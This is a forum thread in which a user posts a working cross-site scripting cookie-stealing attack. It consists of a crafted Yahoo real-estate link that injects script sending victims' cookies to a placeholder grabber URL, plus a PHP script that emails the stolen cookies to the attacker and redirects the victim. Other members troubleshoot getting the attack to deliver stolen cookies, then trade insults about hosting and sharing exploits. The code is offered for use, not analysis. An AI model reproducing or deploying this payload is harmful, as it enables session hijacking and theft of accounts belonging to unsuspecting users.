AuthorMessage
Sad_Dreamer
n00b
Posts: 12

Cookie
Code:

<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0&quot;&gt;&lt;script&gt;location.href='http://www.site.com/grabber.php?email=youremail@yahoo.com&cookie='+escape(document.cookie)&lt;/script&gt;" >
Click Me</a></div>

Edit in link youremail @ yahoo.com with ur email and edit (in link) http://www.site.com/grabber.php with the path to ur php grabber script
Php grabber script:
Code:

<?php
$myemail = $_GET['email'];
$cookie = $_GET['cookie'];
$today = date("l, F j, Y, g:i a") ;
$subject = "Master you have an sucker" ;
$message = "\nDate: $today \n\nCookie: \n$cookiet";
$from = "From: Grandma<grandma@cookies.net>\r\n";
mail($myemail, $subject, $message, $from);
echo "<meta http-equiv='refresh' content='1;url=http://www.meka-meka.com'>";
?>

vickmaker
Ametuar
Posts: 127

ty 
//v
edit:
set it all up, when i click on link in the html, the grabber page just refreshes continuously??
only changed the name of the script file, and edited path in the html accordingly.
cheers
//v
Sad_Dreamer
n00b
Posts: 12

nope...when u click on link he redirects u to http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html
then redirects to ur grabber then redirect u to meka-meka.com :-)
ul grabber on a host with mai function active
PS: u must edit email adress (youremail@yahoo.com) in the cookie exploit too i
Works Only In IE
vickmaker
Ametuar
Posts: 127

:TEST DATA:
when i click link in the html i get the search results and the redirect to the 404 here via the grabber script site.
so all appears to be good, except no new mails, YET, lol,
cant figure why, surely it cant be because ive used a .co.uk YH mail and not a .com one?
ill go test that theory now.
SD, if this is my error can u PM me infos pls, as dont want fagz getting spoonfed this stuff. here.
thanks man
//v
vickmaker
Ametuar
Posts: 127

hmmmmmm, all appears to be good but no new mail.  :?
ive changed the test mail addy to a dotcom also,
i know i have this all setup correctly yet there is 1 thing missing and that is new mail
in my test inbox, could it be that because i know little or no PHP i cannot tell if there is
any error in the script?
also SD when you say
Quote:
ul grabber on a host with mai function active
is the word with the letter missing "mai" sposed to be "main" as in "main function"? or do you mean some setting at my mail acc?
cheers brov
//v
Dark
n00b
Posts: 45

yea, same here
i tried 3 diff web servers but i dont got any mail with cookies
Sad_Dreamer
n00b
Posts: 12

yes vick i wanted to say MAIL FUNCTION sry for missspeliing...i dont do like this...i dont use the exploit to send email with cookies....but i heard its works...i made a new grabber who saves cookies in a .txt file on that server...i think u got the idea if u cant do like this post here and i'll make a video tutorial ;-) cheers
vickmaker
Ametuar
Posts: 127

well i nvr actually got this actual exploit to work, because i was using cheap free webhosting with no mail support, dUH!! (lol),
but i found some good stuff on xss and other .php cookie grabbers,
that make for some interesting times.
 thanks br0v.
//v
m4rg3
Clone
Posts: 2

Whats stopping teamelilte(lulz) from hosting there own websites??
Also am I honestly the only one here that relizes that this is a XSS? Come on now, your better then that.
ps. you know, there is no need for headers (from field) in the php mail() right?
Ashura
Unstopable
Posts: 370

Quoted from m4rg3
Whats stopping teamelilte(lulz) from hosting there own websites??

this is the wrong forum to ask... your post is offtopic + its none of your concern where we host our websites
Meka][Meka
Unstopable
Posts: 700

Quoted from m4rg3
Whats stopping teamelilte(lulz) from hosting there own websites??
Also am I honestly the only one here that relizes that this is a XSS? Come on now, your better then that.
ps. you know, there is no need for headers (from field) in the php mail() right?

teamelite do not post exploits, they're for us only... this is a public forum, anyone can post anything...
m4rg3
Clone
Posts: 2

Quoted from Meka][Meka
Quoted from m4rg3
Whats stopping teamelilte(lulz) from hosting there own websites??
Also am I honestly the only one here that relizes that this is a XSS? Come on now, your better then that.
ps. you know, there is no need for headers (from field) in the php mail() right?

teamelite do not post exploits, they're for us only... this is a public forum, anyone can post anything...

Ah yes. the 1337 hackers with no sence of shared knowledge. So let me get this stright. Your team has no want to share its knowledge in public? To me no matter how good you are this makes you even worse the a script kiddy.
And where can I post about asking why your team cannot host its own website? Because it seems like one of your own members, vickmaker said that he could not get it to work for this reason.
@vick if your worryed about them finding your ip address, I wouldnt be. It would take a little more then a call from Yahoo and I can guarantee any host would turn over ALL info they have on you.
this being said. I have no affiliation to these so called 'hackers' that spammed your form earlier. And I do not mean to clam that I am better then you or that you are not 'elite' After all how many people clam to be elite and are not? But I did ask a simple question and would like a answer. Why cant you host your own web server on your computer and use it to host the 'sploit' that takes copy and pasting?
@Ashura: I love your avatar and Sig. Elfen lied is one of the best anime shows I've seen next to Serial experiments lain and FMA.
Meka][Meka
Unstopable
Posts: 700

Quoted from m4rg3

Ah yes. the 1337 hackers with no sence of shared knowledge. So let me get this stright. Your team has no want to share its knowledge in public? To me no matter how good you are this makes you even worse the a script kiddy.

errr and how do u you work that our m'a'rg'e', u talk about us being 1337 script kiddies, why does your nick contain numbers as letters???
Quoted from m4rg3

And where can I post about asking why your team cannot host its own website?

why on earth would we want todo that?
Quoted from m4rg3

Because it seems like one of your own members, vickmaker said that he could not get it
to work for this reason.

and?
Quoted from m4rg3

this being said. I have no affiliation to these so called 'hackers' that spammed your form earlier. And I do not mean to clam that I am better then you or that you are not 'elite' After all how many people clam to be elite and are not? But I did ask a simple question and would like a answer. Why cant you host your own web server on your computer and use it to host the 'sploit' that takes copy and pasting?

again, why would we want todo that???? 
Ashura
Unstopable
Posts: 370

http://portal.te-home.net/forum/  << te forum
i dont think vick meant anything about hacking some1 elses website.
this is programming forum, we do not have much of an interest in exploits of a software not written by members of this forum
dzadzuks
Ametuar
Posts: 135

This guy is funny... Is it some sort of a rule that all ppl/teams must host theyr own web server? 
Btw teamelite has its own servers.. many of them but thos are not web servers, we can share our information via those servers when we need ;)